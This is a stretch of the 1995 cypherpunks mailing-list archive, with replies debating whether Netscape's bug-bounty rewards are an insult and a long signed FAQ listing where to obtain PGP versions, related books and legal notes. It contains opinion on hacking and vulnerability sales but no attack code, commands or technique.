dreck to find those people reporting serious problems.  (Also, the bug
rewards are only for "serious bugs".  Who defines what is serious and what
is not.  I know of a couple that have been hanging around for a couple of
versions now.  Maybe I should test if they got fixed with 2.0b1.  Probibly
not.  They only hit a handful of people.)

Netscape is still a pretty new company.  Some seem to forget that .90 was
only released about a year ago.  How long does it take to get a proper QC
department in place?  (After the shakeup in February(?) when the new
President was hired, I would have thought it would have been done then.  Now
I am not so sure...)  I know of at least one product that went out the door
in recient months that was not properly tested.  (The stack and dialer used
with Netscape PE comes to mind.)  I realize that sales sometimes forces
things to be released before its time, but there has to be some basic
controls for quality control.  (I will not mention some of the bigger gaffes
with 1.0 and 1.1 since not all of those were publicized.  A few simple
things could have caught them before they went out the door.)

I want to see Netscape succeed, but when you hear about things like product
being released on the net without warning those people responsible for
supporting it, bug reports being ignored so a ship date can be made, and the
like, it makes you really wonder.  I am finding problems with 2.0b1 that
could have been found just by using the product for a couple of days!  Most
of the problems I have seen with Netscape could be solved with better
communications between departments within the company and some strong
testing procedures.

>  We also can't visit every web page, or think of every combination
>of features that clever people in the real world come up with every
>day.  

Somethings are real simple.  Things like giving it to a handful of people
and letting them use it for a couple of days before you release it to the
rest of the world.  90% of the bugs will be pointed out through having
someone beat on it as they would any other peice of software.  And those
people should be someone other than the programmers.  (Sometimes you get too
close to the code to really stress it properly.)

I agree that you need to have a beta program.  Not everything can be tested.
But QC is important.  This is not Uncle Jim's pet project anymore...

All of this has been brought up on the net before.  Sometimes it seems like
the responses are more defensive than trying to find out the real problems
and fix them.  So far, you have been one of the few who has pushed for
getting some of these things fixed in a timely manner.  (I can name a few
others as well.  They seem to get burned out after a while though...)

I think my biggest questions right now are: "Is there a formal testing
procedure for product that is about to go out the door?  Is there a real QC
department and do they have the power to stop releases if significant
problems are found?"
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 14 Oct 95 09:06:02 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141153.AA16412@all.net>
Message-ID: <9510141605.AA03487@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Frederick B. Cohen writes:
 > 	The idea that Netscape (like Microsoft) thinks they can get free
 > testing services from all over the net by real experts just by offerring
 > a tee shirt is down right offensive.
[...$25k...]

They always did that, without even giving away T-shirt since they
released the first beta version to world. As long as people enjoy
playing for free with a product and give feed back and see the program
improved... why would it stop ? 
Personally, though I prefer free products (but ppl have to get some
money for a living....), I think it is not that bad an idea, and
I trust lot of people will continue to do it for the fun of it {As
long as the company is *really* listening to reports....}

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

cryptographic arrangements Ortega South Africa SDI plutonium CIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MIGUELDIAZ@megaweb.com (Miguel Diaz)
Date: Sat, 14 Oct 95 14:24:14 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510142121.RAA06091@mail-e1a.megaweb.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes in part:

>The idea that Netscape (like Microsoft) thinks they can 
>get free testing services from all over the net by real 
>experts just by offerring a tee shirt is down right 
>offensive.
>

Ditto.  The next major hack of Netscape will likely be used to 
bring that company to its knees. Unless one assumes that 
obvious backdoors will still be unprotected by their new code, 
a lot of computing time for brute force attacks and algorithm 
development will have to be spent to properly crack Netscape 
again. I seriously doubt the successful individuals will 
merely settle for fame and not fortune this time around.

OTOH I would much rather see MS get hacked next. If the 
rumors of MS being a Hard Drive Peeping Tom are true, then I 
wonder if there might be a way to send a byte bomb to their 
bit bucket??.......

Be Well








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sat, 14 Oct 95 14:51:11 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141153.AA16412@all.net>
Message-ID: <199510142153.RAA01017@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net said:
> 	The idea that Netscape (like Microsoft) thinks they can get free 
> testing services from all over the net by real experts just by 
> offerring a tee shirt is down right offensive.

They can. Maybe not from you, but people were poking holes in Netscape before 
*anything* was offered. Greed isn't the sole motivator of people.

> 	I have a better idea.  How about an open market in break-in 
> software.  We crack Netscape and offer the crack code to the highest 
> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has 
> to outbid the competition by a factor of 2 to get the details of the 
> hole. Here's how it works:

A bit too mercenary-like for my tastes, and a bit lacking in ethics. Tracking 
down security holes and selling them to the highest bidder without giving 
details to all doesn't just hurt Netscape.

> 	I have an even better idea.  How about if Netscape gets some 
> competent programmers with real security expertise, adds in some good 
> change controls, a serious internal testing program, quality control 
> ala ISO-9000, internal IT auditors, external IT auditors, training 
> and education for their employees, and everything else it takes to be 
> in the software business in a serious way.

This sounds like a better idea. And it isn't mutually exclusive with the "Bugs 
Bounty" or T-shirts.

From what I recall, Netscape has hired decent programmers. I don't know about their internal business practices. From what I've seen, though, they have the right attittude about fixing security, rather than sweeping it under the rug and suing people who alledge security faults. Certainly their release of their PRNG code is proof of that.

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 14 Oct 95 15:52:44 PDT
To: cypherpunks@toad.com
Subject: ESP_ion
Message-ID: <199510142252.SAA29703@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Simone has provided a copy of the LA Times July 23 report
   on the CIA's economic espionage.


   ESP_ion  (10 kb)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@netcom.com>
Date: Sat, 14 Oct 95 21:28:59 PDT
To: Where to get PGP list <viacrypt@acm.org
Subject: Where to Get PGP
Message-ID: <Pine.SUN.3.91.951014211209.9333A-100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP) FAQ 14 OCTOBER 1995
Long version


For questions not covered here, please see the MAIN alt.security.pgp FAQ at

ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt


WHAT IS THE LATEST VERSION OF PGP?

Platform(s)       Latest Version        Distribution File Names
__________________________________________________________________________
|                |                     |                                 |
|DOS, Unix,      | Viacrypt PGP 2.7.1  | disk sets                       |
|Mac, Windows,   |                     |                                 |
|or WinCIM/CSNav |                     |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Hardware-based  | Viacrypt 2.7.1      | disk sets                       |
|PGP/Token       |                     |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|DOS, Unix, VAX, | MIT PGP 2.6.2       | pgp262.zip  (DOS + docs)        |
|others          |                     | pgp262s.zip (source)            |
|                |                     | pg262s.zip source on CompuServe |
|                |                     | pgp262s.tar.gz (source)         |
|                |                     | pgp262s.tar.Z (source)          |
|                |                     | pgp262dc.zip (documentation)    |
|                |                     | pg262d.zip (docs on CompuServe) |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Macintosh       | MIT PGP 2.6.2       | MacPGP2.6.2-130v1.hqx           |
|                | Mac version 1.3.0   | m262pgp.hqx (same as above)     |
|                |                     | MacPGP2.6.2-130v1.source.asc    |
|                |                     | m262pgps.asc (same as above)    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Power Mac       | Zbigniew's "beta"   | Fatmacpgp262b131.sea.hqx        |
|                |                     | f262pgp.hqx (same as above)     |
|                |                     | Fatmacpgp262b131.src.hqx        |
|                |                     | f262pgps.hqx (same as above)    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Amiga           | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha              |
|                |                     | pgp262-a14-020.lha              |
|                |                     | pgp262-a14-src.lha              |
|                |                     | PGPAmi262is.lha (international) |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Atari           | Atari MIT PGP 2.6.2 | pgp262st.zip                    |
|                | Atari International | pgp262ib.zip                    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|OS/2            | MIT PGP 2.6.2       | pgp262-os2.zip                  |
|                |                     | on ftp.gibbon.com               |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Non-USA version | PGP 2.6.2i from     | pgp262i.zip  (DOS executable)   |
|to avoid RSAREF | Stale Schumacher,   | pgp262ix.zip (32-bit DOS)       |
|license.        | Kai Uwe Rommel,     | pgp262i-os2.zip (OS/2 exe)      |
|(various        | Harald Denker, and  | pgp262ib.zip (Atari)            |
|platforms)      | Peter Simons        | PGPAmi262is.lha (Amiga)         |
|                |                     | pgp262is.zip (source)           |
|                |                     | pgp262is.tar.gz (Unix source)   |
|                |                     |                                 |
|                | Canadian "mutant"   | MacPGP262ca124.exe.sea.hqx      |
|                | not for USA use     | MacPGP262ca124.src.sea.hqx      |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Unofficial      | PGP 2.6.2ui         | pgp262ui.zip (executable)       |
|non-USA version | Not for use in the  | pg262uis.zip (source)           |
|fully under Gnu | USA because of      | pg262uix.zip (DOS extended)     |
|public license  | probable patent     |                                 |
|(based on 2.3a  | infringement        |                                 |
|code)           | problems.           |                                 |
|________________|_____________________|_________________________________|


BUG LISTS

http://www.ifi.uio.no/~staalesc/PGP/bugs.html
http://www.mit.edu:8001/people/warlord/pgp-faq.html



WHERE CAN I GET VIACRYPT PGP?

Viacrypt has versions of PGP complete with licenses for
commercial use of the RSA and IDEA encryption algorithms.
Viacrypt PGP comes in executable code only (no source code),
but it is based on (and just as secure as) the freeware PGP.
Viacrypt PGP for Windows is the only real Windows PGP (and even
it is partially a quickwin executable that looks like a DOS
port).  Still, it is much better from an interface standpoint
than all the others.

Please contact ViaCrypt for pricing (about US $100 up), the latest
platforms, and availablity at 800-536-2664 8:30am to 5:00pm
MST, Monday - Friday.  They accept VISA, MasterCard, AMEX and
Discover credit cards.

http://www.viacrypt.com

If you have further questions, please ask:

Paul E. Uhlhorn
Director of Marketing, ViaCrypt Products
Mail:          9033 N. 24th Avenue
Suite 7
Phoenix AZ 85021-2847
Phone:         (602) 944-0773
Fax:           (602) 943-2601
Internet:      viacrypt@acm.org
Compuserve:    70304.41


WHERE CAN I FTP PGP IN NORTH AMERICA?

If you are in the USA or Canada, you can get PGP by following the
instructions in any of:

ftp://net-dist.mit.edu/pub/PGP/README
ftp://ftp.csn.net/mpj/README.MPJ
ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS
ftp://ftp.netcom.com/pub/mp/mpj/README.MPJ
ftp://ftp.netcom.com/pub/dd/ddt/crypto/READ_ME_FIRST!
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_ftp_instructions.txt
ftp://ftp.eff.org

Follow the instructions found in README.Dist that you get from one of:
ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist
gopher.eff.org, 1/Net_info/Tools/Crypto
gopher://gopher.eff.org/11/Net_info/Tools/Crypto
http://www.eff.org/pub/Net_info/Tools/Crypto/

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp/
ftp://ftp.gibbon.com/pub/pgp/README.PGP
http://www.gibbon.com/getpgp.html
ftp://ftp.wimsey.bc.ca/pub/crypto/software/README


WHERE IS PGP ON THE WORLD WIDE WEB?

http://web.mit.edu/network/pgp-form.html
http://www.ifi.uio.no/~staalesc/PGP/home.html
http://rschp2.anu.edu.au:8080/crypt.html
http://www.eff.org/pub/Net_info/Tools/Crypto/
http://community.net/community/all/home/solano/sbaldwin
http://www.cco.caltech.edu/~rknop/amiga_pgp26.html
http://www.csua.berkeley.edu/cypherpunks/home.html
http://www.leo.org/archive/os2/crypt/
http://colossus.net/wepinsto/wshome.html
http://www.cs.hut.fi/ssh/crypto/


WHERE IS PGP ON COMPUSERVE?

GO NCSAFORUM.  Follow the instructions there to gain access to
Library 12: Export Controlled.

Compuserve file names are limited, so look for PGP262.ZIP,
PG262S.ZIP (source code), PGP262.GZ (Unix source code) and
PG262D.ZIP (documentation only).


AOL

Go to the AOL software library and search "PGP" or ftp from
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp.


WHAT BULLETIN BOARD SYSTEMS CARRY PGP?

MANY BBS carry PGP.  The following carry recent versions of PGP
and allow free downloads of PGP.

US

303-343-4053 Hacker's Haven, Denver, CO Lots of crypto stuff here.
303-772-1062 Colorado Catacombs BBS, Longmont CO
    8 data bits, 1 stop, no parity, up to 28,800 bps. Use ANSI terminal
    emulation.  For free access: log in with your own name, answer the
    questions.
303-914-0031 The FreeMatrix ]I[
314-896-9309 The KATN BBS
317-791-9617 Computer Virus Research Center (CVRC) BBS, Indianapolis, IN
    Login Name: PGP USER  Password: PGP
501-791-0124, 501-791-0125 The Ferret BBS, North Little Rock, AR
    Login name: PGP USER  Password: PGP
506-457=0483 Data Intelligence Group Corporation BBS
508-668-4441 Emerald City, Walpole, MA
601-582-5748 CyberGold BBS
612-690-5556, !CyBERteCH SeCURitY BBS! Minneapolis MN, - write a letter
    to the sysop requesting full access.
914-667-4567 Exec-Net, New York, NY
915-587-7888, Self-Governor Information Resource, El Paso, Texas


UK

01273-688888

GERMANY

+49-781-38807 MAUS BBS, Offenburg - angeschlossen an das MausNet
+49-521-68000 BIONIC-BBS Login: PGP


WHERE CAN I FTP PGP CLOSE TO ME?

AU

ftp://ftp.cc.adfa.oz.au/pub/security/pgp23/macpgp2.3.cpt.hqx
ftp://ftp.iinet.net.au:mirrors/pgp (Australia ONLY)
ftp://plaza.aarnet.edu.au/micros/mac/umich/misc/documentation/howtomacpgp2.7.txt

DE

ftp://ftp.informatik.tu-muenchen.de/pub/comp/os/os2/crypt
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/pgp
ftp://ftp.fu-berlin.de/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz
ftp://ftp.tu-clausthal.de/pub/atari/misc/pgp/pgp261b.lzh
ftp://ftp.uni-kl.de/pub/aminet/util/crypt
ftp://ftp.uni-paderborn.de/pub/aminet/util/crypt
ftp://ftp.westfalen.de/pd/Atari/Pgp  (Atari)
ftp://tupac-amaru.informatik.rwth-aachen.de

ES

ftp://goya.dit.upm.es
ftp://encomix.es/pub/pgp/pgp262i/pgp262i.zip

IT

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP

FI

ftp://ftp.funet.fi/pub/crypt

NL

ftp://ftp.nl.net/pub/crypto/pgp
ftp.nic.surfnet.nl/surfnet/net-security/encryption/pgp

NZ

ftp://ftphost.vuw.ac.nz
ftp://rs950.phys.waikato.ac.nz/pub/incoming/pgp (New Zealand ONLY)

SE

ftp://leif.thep.lu.se

TW

ftp://nctuccca.edu.tw/PC/wuarchive/pgp/

UK

ftp://ftp.demon.co.uk/pub/amiga/pgp
ftp://ftp.ox.ac.uk/pub/crypto/pgp
ftp://src.doc.ic.ac.uk/aminet/amiga-boing
ftp://unix.hensa.ac.uk/pub/uunet/pub/security/virus/crypt/pgp

USA

ftp://atari.archive.umich.edu/pub/atari/Utilities/pgp261st.zip (Atari)
ftp://ftp.leo.org/pub/comp/os/os2/crypt
ftp://wuarchive.wustl.edu/pub/aminet/util/crypt
ftp://ftp.netcom.com/pub/gr/grady/PGP_NOT_FOR_EXPORT/MacPGP262ca124.exe.sea.hqx
ftp://ftp.netcom.com/pub/gr/grady/PGP_NOT_FOR_EXPORT/MacPGP262ca124.src.sea.hqx

ZA

ftp://ftp.ee.und.ac.za/pub/crypto/pgp
    /pub/archimedes
    /pub/pgp
    /pub/mac/MacPGP


HOW CAN I GET PGP BY EMAIL?

If you have access to email, but not to ftp, send a message
saying "help" to

ftpmail@decwrl.dec.com,

mailserv@nic.funet.fi, or

ftp-request@netcom.com

To get pgp 2.6.2i by email:

Send a message to
pgp@hypnotech.com with your request in the
Subject: field.

Subject              What you will get

GET pgp262i.zip      MS-DOS executable (uuencoded)
GET pgp262is.zip     MS-DOS source code (uuencoded)
GET pgp262is.tar.gz  UNIX source code (uuencoded)


For FAQ information, send e-mail to

mail-server@rtfm.mit.edu with

send usenet/news.answers/ftp-list/faq

in the body of the message.


WHERE IS MACPGP?

ftp://ftp.csn.net/mpj/README.MPJ
ftp://ftp.confusion.net/pub/pgp/mac-pgp/README
ftp://highway.alinc.com/users/jordyn/mac-pgp/README
ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS


WHERE IS VAX PGP?

Get the full PGP distribution, then get VAXPGP262.TAR.Z from
the berkeley site for additional files needed to compile PGP
for the VAX and a precompiled version for VAX/VMS 5.5-2.


WHERE CAN I GET MORE PGP INFORMATION?

http://www.csn.net/~mpj
ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt
ftp://starfire.ne.uiuc.edu/preston/pgpquick.ps (and
pgpquick.doc)
http://www.prairienet.org/~jalicqui/
http://www.mit.edu:8001/people/warlord/pgp-faq.html
http://draco.centerline.com:8080/~franl/crypto.html
http://draco.centerline.com:8080/~franl/pgp/bug0.html
http://www.eff.org/pub/EFF/Issues/Crypto/ITAR_export/cryptusa_paper.ps.gz
http://www.eff.org/pub/EFF/Issues/Crypto/ITAR_export/cryptusa.paper
http://www.cco.caltech.edu/~rknop/amiga_pgp26.html
Email
pgp-help@hks.net
ftp://ds.internic.net/internet-drafts/draft-pgp-pgpformat-00.txt
ftp://ds.internic.net/internet-drafts/draft-ietf-pem-mime-08.txt
http://www.cis.ohio-state.edu/
ftp://ftp.csn.net/mpj/public/pgp/MacPGP262_manual.sit.hqx
http://www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html
http://web.cnam.fr/Network/Crypto/ (c'est en francais)
http://web.cnam.fr/Network/Crypto/survey.html (en anglais)
http://www2.hawaii.edu/~phinely/MacPGP-and-AppleScript-FAQ.html
ftp://ftp.prairienet.org/pub/providers/pgp/pgpbg11.asc (Beginner's Guide)
http://pluto.cc.umr.edu/~steve/Privacy_Page.html/Where_is_PGP.html
http://www.netresponse.com/zldf
http://bookweb.cwis.uci.edu:8042/Orders/ubipgp.html
http://www.geopages.com/Athens/1802/pgpfaq.html
http://www.pgp.net/pgp
http://www.sydney.sterling.com:8080/~ggr/pgpmoose.html
Beginner's Guide: send email to
slutsky@lipschitz.sfasu.edu, subject: bg2pgp


WHAT ARE SOME GOOD PGP BOOKS?

Protect Your Privacy: A Guide for PGP Users
by William Stallings
Prentice Hall PTR
ISBN 0-13-185596-4
US $19.95
This is a good technical manual for PGP for most users, and makes a better
reference than the "official" documentation that comes with PGP.  I recommend
it highly.

PGP: Pretty Good Privacy
by Simson Garfinkel
O'Reilly & Associates, Inc.
ISBN 1-56592-098-8
US $24.95

E-Mail Security: How to Keep Your Electronic Mail Private
"Covers PGP/PEM"
by Bruce Schneier
Wiley Publishing

The Computer Privacy Handbook: A Practical Guide to E-Mail Encryption, Data
Protection, and PGP PRivacy Software
by Andr&eacute; Bacard
Peachpit Press
ISBN 1-56609-171-3
US $24.95
800-283-9444 or 510-548-4393
This is an interesting book on the sociology and politics of privacy in the
computer age as well as a practical manual on using PGP.  Must reading for
all members of Congress, presidential staff, members of Parliament, and
ordinary citizens who would like to take reasonable steps to protect
themselves from some forms of crime that have been made easy by technology.

THE OFFICIAL PGP USER'S GUIDE
by Philip R. Zimmerman
MIT Press
April 1995 - 216 pp. - paper - US $14.95 - ISBN 0-262-74017-6 ZIMPP
Standard PGP documentation neatly typeset and bound.

PGP SOURCE CODE AND INTERNALS
by Philip R. Zimmerman
April 1995 - 804 pp. -
US $55.00 - 0-262-24039-4 ZIMPH
This is a handy printed reference with commented source code for PGP 2.6.2
with great educational value.  This is a great way to study some of the
computer science and information theory behind the world's best email privacy
tool without having either a computer or reams of printouts handy.
Recommended reading on long airline flights for serious students of computer
science and computer security.

Ordering information for the last two books:
Call US Toll Free 1-800-356-0343 or 617-625-8569.
Cite code 5CSC and number 661.
Allow 4-6 weeks for delivery within North America.
Allow 8-12 weeks for delivery outside of North America.

How to Use PGP, 61 pages,  (Pub #121) from the Superior Broadcasting Company,
Box 1533-N, Oil City, PA 16301, phone: (814) 678-8801 (about US $10-$13).


WHERE CAN I GET PGP LANGUAGE MODULES?

These are suitable for most PGP versions.


http://www.ifi.uio.no/~staalesc/PGP/language.html
ftp://ftp.ifi.uio.no/pub/pgp/doc/
German

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt
ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt
ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha
ftp://ftp.informatik.uni-hamburg.de:/pub/virus/crypt/pgp/language/pgp_german.asc
ftp://ftp.leo.org/pub/comp/os/os2/crypt/pgp262i-german.zip

Italian

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz
ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz
ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz

Japanese

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz
ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz

Lithuanian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip
ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip

Norwegian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_norwegian.tar.gz
ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26i_norwegian.zip

Romanian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_romanian.tar.gz
ftp://ftp.encomix.es/pub/pgp/lang/pgp-romanian.zip
http://www.info.polymtl.ca/zuse/tavi/www/archive/ro_2.6.2.zip
http://www.info.polymtl.ca/zuse/tavi/www/archive/language.txt

Russian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip
ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip
ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip

Spanish

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz
ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz
ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz
ftp://ftp.encomix.es/pub/pgp/lang/pgp262i-spanish.zip

Swedish

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt
ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt


IS PGP MORALLY RIGHT?

PGP itself is morally neutral.  What you do with it is not.  Protecting
privacy, prevention of criminal theft, and taking due diligence to
protect certain business information (like credit card numbers,
customer lists, etc.) are good uses for PGP.  Concealing criminal
or other immoral activity is wrong.  You can fool the police some
of the time, but you can't fool God.


IS PGP LEGAL?

Pretty Good Privacy is legal if you follow these rules:

Don't export PGP from the USA except to Canada, or from
Canada except to the USA, without a license.

If you are in the USA, use either Viacrypt PGP (licensed
for commercial use) or MIT PGP using RSAREF (limited to
personal, noncommercial use).  Outside of the USA, where
RSA is not patented, you may prefer to use a version of
PGP (2.6.i) that doesn't use RSAREF to avoid the
restrictions of that license.

If you are in a country where the IDEA cipher patent
holds in software (including the USA, Canada, and some
countries in Europe), make sure you are licensed to use
the IDEA cipher commercially before using PGP
commercially.  (No separate license is required to use
the freeware PGP for personal, noncommercial use).  For
direct IDEA licensing, contact Ascom Systec.

Ascom Systec has taken over the distribution of IDEA
licenses effective April 1, 1995. Erhard Widmer is the
person responsible for the sales aspects, and Peter
Hartmann is responsible for the technical aspects. They
can be reached as follows:

Erhard Widmer,  Ascom Systec AG, Dep't. CMVV      Phone  +41 64 56 59 83
Peter Hartmann, Ascom Systec AG, Dep't. CMN       Phone  +41 64 56 59 45

Fax:            +41 64 56 59 90
e-mail:         IDEA@ascom.ch
Mail address:   Gewerbepark, CH-5506 Maegenwil (Switzerland)

Don't sell PGP based on Philip Zimmermann's source code in
North America unless you are reselling for Viacrypt (because
they have an exclusive marketing agreement on Philip
Zimmermann's copyrighted code). (Selling shareware/freeware
disks or connect time is OK).  This restriction might be
lifted with PGP 3.0, since it is a complete rewrite by Colin
Plumb.  Distribution and use restrictions on that version are
still to be determined.

If you modify PGP (other than porting it to another platform
or adapting it to another compiler), don't call it PGP (TM)
or Pretty Good Privacy (TM) without Philip Zimmermann's
permission.


WHAT IS PHILIP ZIMMERMANN'S LEGAL STATUS?

Philip Zimmermann is under investigation for alleged violation
of export regulations, with a grand jury hearing evidence.
There is speculation that the Feds are trying to make an
example of Phil through prolonged and expensive legal
proceedings, thus reaping a reward of Fear, Uncertainty, and
Doubt to discourage development and use of strong crypto in the
USA.

Even though people in this country are considered innocent
until proven guilty, there is a problem with the system in that
it can take lots of money for innocent folks to defend
themselves.  Because of the broad implications for freedom,
privacy, and the First Amendment of the U. S. Constitution in
this case, I implore all of you who can to help out with Phil's
rather significant legal and travel expenses involved in his
defense.  Phil is a nice guy with a wife and two children to
support, and he has done a great deal in his PGP social
activism to help all of us.

To send a check or money order by mail, make it payable, NOT to
Phil Zimmermann, but to "Philip L. Dubois, Attorney Trust
Account."  Mail the check or money order to the following
address:

Philip Dubois
2305 Broadway
Boulder, CO USA 80304
(Phone #: 303-444-3885)

To send a wire transfer, your bank will need the following
information:

Bank: VectraBank
Routing #: 107004365
Account #: 0113830
Account Name: "Philip L. Dubois, Attorney Trust Account"

To contribute using your credit card (secured with PGP), simply
compose a message in plain ASCII text giving the following: the
recipient ("Philip L.  Dubois, Attorney Trust Account"); the
bank name of your VISA or MasterCard; the name which appears on
it (yours, hopefully :-)); a telephone number at which you can
be reached in case of problems; the card number; date of
expiry; and, most important, the amount you wish to donate.
(Make this last item as large as possible.) Then use PGP to
encrypt and ASCII-armor the message using Phil Dubois's public
key, distributed with PGP 2.6.2.  E-mail the output file to
Phil Dubois (dubois@csn.org).
Please be sure to use a "Subject:" line reading something like
"Phil Zimmermann Defense Fund" so he'll know to decrypt it
right away.


WHERE CAN I GET WINDOWS & DOS SHELLS FOR PGP?

http://www.ifi.uio.no/~staalesc/AutoPGP.html
http://www.dayton.net/~cwgeib
ftp://oak.oakland.edu/SimTel/msdos/security/apgp22b.zip
ftp://oak.oakland.edu/SimTel/win3/security/pgpw40.zip
http://alpha.netaccess.on.ca/~spowell/crypto/pwf31.zip
ftp://ftp.netcom.com/pub/dc/dcosenza/pgpw40.zip
ftp://Sable.ox.ac.uk/pub
ftp://ftp.firstnet.net/pub/windows/winpgp/pgpw40.zip  &lt;WinPGP's home site&gt;
http://www.firstnet.net/~cwgeib/welcom.html
ftp://ftp.netcom.com/pub/ec/ecarp/pgpwind.zip
http://www.eskimo.com/~joelm (Private Idaho)
ftp://ftp.eskimo.com/~joelm
http://www.xs4all.nl/~paulwag/security.htm
http://www.LCS.com/winpgp.html
ftp://mirrors.aol.com/mir01/circa/pub/pc/win3/util/pwf31.zip
http://netaccess.on.ca/~rbarclay/index.html
http://netaccess.on.ca/~rbarclay/pgp.html
ftp://ftp.leo.org/pub/comp/os/os2/crypt/gcppgp10.zip
ftp://ftp.leo.org/pub/comp/os/os2/crypt/pmpgp.zip
http://iquest.com/~aegisrcs

Compuserve:
Library 3, European Forum.
Library 6, NCSA Forum
PCWorld Online Forum.
WUGNET Forum.
WinShare Forum

See also the BBS list for PGP, above.


WHERE CAN I GET THE MACPGP KIT?

ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/MacPGPkit1.6.sit

OTHER MAC ADD-ONS

ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/ChainMail.0.7.sit
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/Eudora->PGP Scripts1.5.sit
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/pgp/mac/AppleScripts


WHERE IS THE PGP 3.0 API DRAFT?

The (prelim. draft) PGP 3.0 API is at:

ftp://ftp.netcom.com/pub/dd/ddt/crypto/crypto_info/950212 pgp3spec.txt
All comments on it for the PGP 3.0 API Team should be sent to:
<pgp@lsd.com>


WHAT OTHER FILE ENCRYPTION (DOS, MAC) TOOLS ARE THERE?

PGP can do conventional encryption only of a file (-c) option,
but you might want to investigate some of the other
alternatives if you do this a lot.  Alternatives include
Quicrypt and Atbash2 for DOS, DLOCK for DOS & UNIX, Curve
Encrypt (for the Mac), HPACK (many platforms), and a few
others.

Quicrypt is interesting in that it comes in two flavors:
shareware exportable and registered secure.  Atbash2 is
interesting in that it generates ciphertext that can be read
over the telephone or sent by Morse code.  DLOCK is a no-frills
strong encryption program with complete source code.  Curve
Encrypt has certain user-friendliness advantages.  HPACK is an
archiver (like ZIP or ARC), but with strong encryption.

A couple of starting points for your search are:

ftp://ftp.csn.net/mpj/qcrypt10.zip
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/file/
